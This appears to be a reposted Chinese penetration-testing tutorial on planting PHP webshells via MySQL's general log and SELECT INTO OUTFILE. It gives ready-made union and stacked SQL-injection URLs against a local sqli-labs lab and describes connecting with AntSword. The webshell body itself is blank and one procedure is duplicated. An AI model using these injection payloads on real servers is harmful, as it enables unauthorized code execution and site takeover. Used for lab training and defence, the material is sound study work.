社区所有版块导航
Python
python开源   Django   Python   DjangoApp   pycharm  
DATA
docker   Elasticsearch  
aigc
aigc   chatgpt  
WEB开发
linux   MongoDB   Redis   DATABASE   NGINX   其他Web框架   web工具   zookeeper   tornado   NoSql   Bootstrap   js   peewee   Git   bottle   IE   MQ   Jquery  
机器学习
机器学习算法  
Python88.com
反馈   公告   社区推广  
产品
短视频  
印度
印度  
Py学习  »  DATABASE

MySQL写马详解

WhITECat安全团队 • 2 年前 • 181 次点击  

文章首发于奇安信攻防社区

                                                                           https://forum.butian.net/share/362

一.日志写马

1.1条件

1.全局变量general_log为ON

MySQL的两个全局变量:

general_log指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。

general_log_file 指的是日志的保存路径。

mysql> show global variables like "%general_log%";+------------------+--------------------------------------------------------+| Variable_name    | Value                                                  |+------------------+--------------------------------------------------------+| general_log      | OFF                                                    || general_log_file | D:\phpStudy\PHPTutorial\MySQL\data\DESKTOP-UQAMJKA.log |+------------------+--------------------------------------------------------+2 rows in set (0.02 sec)

如果目前这个general_log为off状态,那么日志就没有被记录进去,所以要先打开这个全局变量。

set global general_log='on';

打开过后,日志文件中就会记录我们写的sql语句。我这里用sqli-labs来进行执行sql语句:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,3--+

打开D:\phpStudy\PHPTutorial\MySQL\data\DESKTOP-UQAMJKA.log日志文件,成功记录

注:不管sql语句是否正确都会记录进去。

不过general_log_file可以直接通过SQL语句修改,而且必须修改为比如php后缀的文件,不然马不能被解析。下面讲第2点条件会详细说明。

2.需要secure_file_priv为空,即secure_file_priv="";或者secure_file_privgeneral_log_file 日志的保存路径的磁盘。不过general_log_file可以直接通过SQL语句修改,必须要修改为比如php后缀的文件,不然马不能被解析:

mysql> set global general_log_file='D:/1.log';Query OK, 0 rows affected (0.07 sec)mysql> show variables like "%general%";+------------------+----------+| Variable_name    | Value    |+------------------+----------+| general_log      | ON       || general_log_file | D:/1.log |+------------------+----------+2 rows in set (0.03 sec)#注:其中路径里的\用\\或者/代替,因为\的话会消失一个mysql> set global general_log_file='D:\1.log';Query OK, 0 rows affected (0.06 sec)mysql> show variables like "%general%";+------------------+---------+| Variable_name    | Value   |+------------------+---------+| general_log      | ON      || general_log_file | D:1.log |+------------------+---------+2 rows in set (0.03 sec)

然后在D盘下就出现1.log成为新的日志文件了。但是最后也要考虑能不能成功的连接到马,像如果secure_file_priv固定为G:\,而网站是搭在D盘上,那把general_log_file修改为G盘下的文件也连接不到,除非还有文件包含漏洞等等。

show global variables like '%secure%';查看可以写入的磁盘。(1)当secure_file_priv为空,就可以写入磁盘的目录。(2)当secure_file_priv为G:\,就可以写入G盘的文件。(3)当secure_file_priv为null,into outfile就不能写入文件。(注意NULL不是我们要的空,NULL和空的类型不一样)

secure_file_priv=””就是可以into outfile写入任意磁盘文件。

secure_file_priv设置通过设置my.ini来配置,不能通过SQL语言来修改,因为它是只读变量,secure_file_priv设置具体看这里:

若secure_auth为ON,则用以下方法变为OFF(mysql查询默认是不区分大小写的)

secure_file_priv不能通过此方法修改,因为报错为Variable ‘XXX’ is a read only variable。报错原因及修改方法为:参数为只读参数,需要在mysql.ini配置文件中更改该参数,之后重启数据库

将secure_file_priv为空的正确方法(注意NULL不是我们要的空,NULL和空的类型不一样)

3.对web目录有写权限MS的系统就不说了,一般都会有权限的,但是linux的系统,通常都是rwxr-xr-x,也就是说组跟其他用户都没有权限写操作。

4.知道物理路径(into outfile ‘物理路径’), 这样才能写对目录。

select @@b asedir;——MySQL数据库安装的绝对路径:

mysql> select @@b asedir;+--------------------------------+| @@b asedir                      |+--------------------------------+| D:/phpStudy/PHPTutorial/MySQL/ |+--------------------------------+1 row in set (0.07 sec)

5.(1)union注入在这里行不通。

因为要日志写马能够连接必须要修改general_log_file为比如php后缀的文件,不然马不能被解析。所以必须要先用到set global general_log_file='...php';,那么union注入就没机会了,union基本都是?id=1 union select 1,2,select '';这样,不能执行set的。

(2)有堆叠注入,要先?id=1;set global general_log_file='...php';,然后直接执行?id=1;select '';

不过首先要想有堆叠注入的条件,源码中必须要用到mysqli_multi_query(),那么我们此处就可以执行多个sql语句进行注入。一般后台查询数据库使用的语句都是用mysql_query(),所以堆叠注入在mysql上不常见。mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句。

堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。

(3)再者就是已经成功登录到别人的数据库里了,要先set global general_log_file='...php';,然后直接执行select '';

6.对方没有对 '"进行过滤,因为outfile后面的物理路径必须要有引号

1.2.用法

例子:直接登录进别人的数据库的时候:

set global general_log_file='...php';select '';

或者堆叠注入:

set global general_log_file='...php';?id=1;select '';或者直接?id=;都可以了,因为sql语句不管对错日志都会记录

1.3过程

这里展示下堆叠注入的日志写马过程,用的是sqli-labs的靶场:

实战中堆叠注入来日志写马就不能用show来看全局变量的值了,所以就直接用sql语句修改。

1.先设置general_log为on:

http://127.0.0.1/sqli-labs-master/Less-38/?id=-1' union select 1,2,3;set global general_log='on';--+

2.再设置general_log_file为一个php后缀文件:

http://127.0.0.1/sqli-labs-master/Less-38/?id=-1' union select 1,2,3;set global general_log_file='D:\\phpStudy\\PHPTutorial\\WWW\\log.php';--+

注:其中路径里的\\\或者/代替,因为\的话会消失一个

在Navicat中查询可以看到真的被改了:

可以看到这里必须要知道网站的绝对路径了。

3. secure_file_priv设置只能通过设置my.ini来配置,不能直接通过SQL语句来修改,因为它是只读变量。而且这里也不能show来看,所以只能看缘分~

4.http://127.0.0.1/sqli-labs-master/Less-38/?id=1';select '';--+

或者直接?id=;都可以了,因为sql语句不管对错日志都会记录

5.最后可以用shell管理工具来连接了。比如我这里用蚁剑成功了:

直接成功登录数据库的日志写马可以说是方法和堆叠注入的差不多,就是可以用show来看全局变量的值。这里就不赘述了。

二、mysql into outfile注射一句话木马

2.1条件

关于mysql into outfile注射,要使用into outfile 把木马写到web目录拿到webshell首先需要有几个条件:

1.就是mysql用户拥有file_priv权限(不然就不能写文件或者读文件)

show global variables like '%secure%';查看into outfile可以写入的磁盘。(1)当secure_file_priv为空,就可以写入磁盘的目录。(2)当secure_file_priv为G:\,就可以写入G盘的文件。(3)当secure_file_priv为null,into outfile就不能写入文件。(注意NULL不是我们要的空,NULL和空的类型不一样)

secure_file_priv=””就是可以into outfile写入任意磁盘文件。

secure_file_priv设置通过设置my.ini来配置,不能通过SQL语言来修改,因为它是只读变量,secure_file_priv设置具体看这里:

若secure_auth为ON,则用以下方法变为OFF(mysql查询默认是不区分大小写的)

secure_file_priv不能通过此方法修改,因为报错为Variable ‘XXX’ is a read only variable。报错原因及修改方法为:参数为只读参数,需要在mysql.ini配置文件中更改该参数,之后重启数据库

将secure_file_priv为空的正确方法(注意NULL不是我们要的空,NULL和空的类型不一样)

2.对web目录有写权限MS的系统就不说了,一般都会有权限的,但是linux的系统,通常都是rwxr-xr-x,也就是说组跟其他用户都没有权限写操作。

3.知道物理路径(into outfile ‘物理路径’), 这样才能写对目录。

select @@b asedir;——MySQL数据库安装的绝对路径:

mysql> select @@b asedir;+--------------------------------+| @@b asedir                      |+--------------------------------+| D:/phpStudy/PHPTutorial/MySQL/ |+--------------------------------+1 row in set (0.07 sec)

4.(1)能够使用union 。(需要mysql 3以上的版本)这个条件是在url里才需要,如果直接登录进别人的数据库,那么就不需要能够使用union了

例子:?id=1 union select '' into outfile "C:/phpStudy/WWW/a.php"?id=1')) UNION SELECT 1,2,'' into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\hack.php" --+

(2)或者有堆叠注入,就可以直接?id=1;select '' into outfile "C:/phpStudy/WWW/a.php"这样执行了。

不过首先要想有堆叠注入的条件,源码中必须要用到mysqli_multi_query(),那么我们此处就可以执行多个sql语句进行注入。一般后台查询数据库使用的语句都是用mysql_query(),所以堆叠注入在mysql上不常见。mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句。

堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。

(3)再者就是已经成功登录到别人的数据库里了,直接执行select '' into outfile "C:/phpStudy/WWW/a.php"

5.对方没有对' "进行过滤,因为outfile后面的物理路径必须要有引号

所以,要满足这几个条件还是蛮高难度的。

如果都满足,写入成功了,那么就可以用shell管理工具进行Getshell了

三、MySQL写入数据select into outfile一句话木马用法

例子:直接登录进别人的数据库的时候:

SELECT ""INTO OUTFILE '/tmp/test1.php'

在url里要用union:

例子:?id=1 union select '' into outfile "C:/phpStudy/WWW/a.php"?id=1')) UNION SELECT 1,2,'' into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\hack.php" --+

或者堆叠注入:

?id=1');SELECT '' into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\hack.php";--+

3.1注意

其中路径里的\\\或者/代替,因为\的话会消失一个

3.2过程

1.判断注入类型

http://127.0.0.1/sqli-labs-master/Less-7/?id=1' 报错http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) --+ 正常

2.判断列数

http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) order by 3 --+ 正常

http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) order by 4 --+ 报错

说明存在3列

3.文件写入

1.判断注入类型

http://127.0.0.1/sqli-labs-master/Less-7/?id=1' 报错http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) --+ 正常

2.判断列数

http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) order by 3 --+ 正常

http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) order by 4 --+ 报错

说明存在3列

3.文件写入

http://127.0.0.1/sqli-labs-master/Less-7?id=1')) UNION SELECT 1,2,'' into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\hack.php" --+

或者"D:/phpStudy/PHPTutorial/WWW/hack.php",就是不能\,经过测试这样导入不成功。

上面的图中报了错:You have an error in your SQL syntax,显示sql出错了,但是没有关系,我们可以在文件中看到hack.php已经生成了。

这时候用菜刀等webshell管理工具连接就可以了,我下面用的是蚁剑,可以看到连接成功。

堆叠注入:http://127.0.0.1/sqli-labs-master/Less-40/?id=1');SELECT '' into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\hack.php";--+

然后该目录下便生成了我们的马儿,用shell管理工具便可成功连接。从这里可以看到一定要知道网站的绝对路径。

直接成功登录数据库的into outfile写入一句话木马可以说是方法和前面两个的差不多,就是可以用show来看全局变量的值。这里就不赘述了。

喜欢此文的师傅们,欢迎三连一波!!!!


Python社区是高质量的Python/Django开发社区
本文地址:http://www.python88.com/topic/126025
 
181 次点击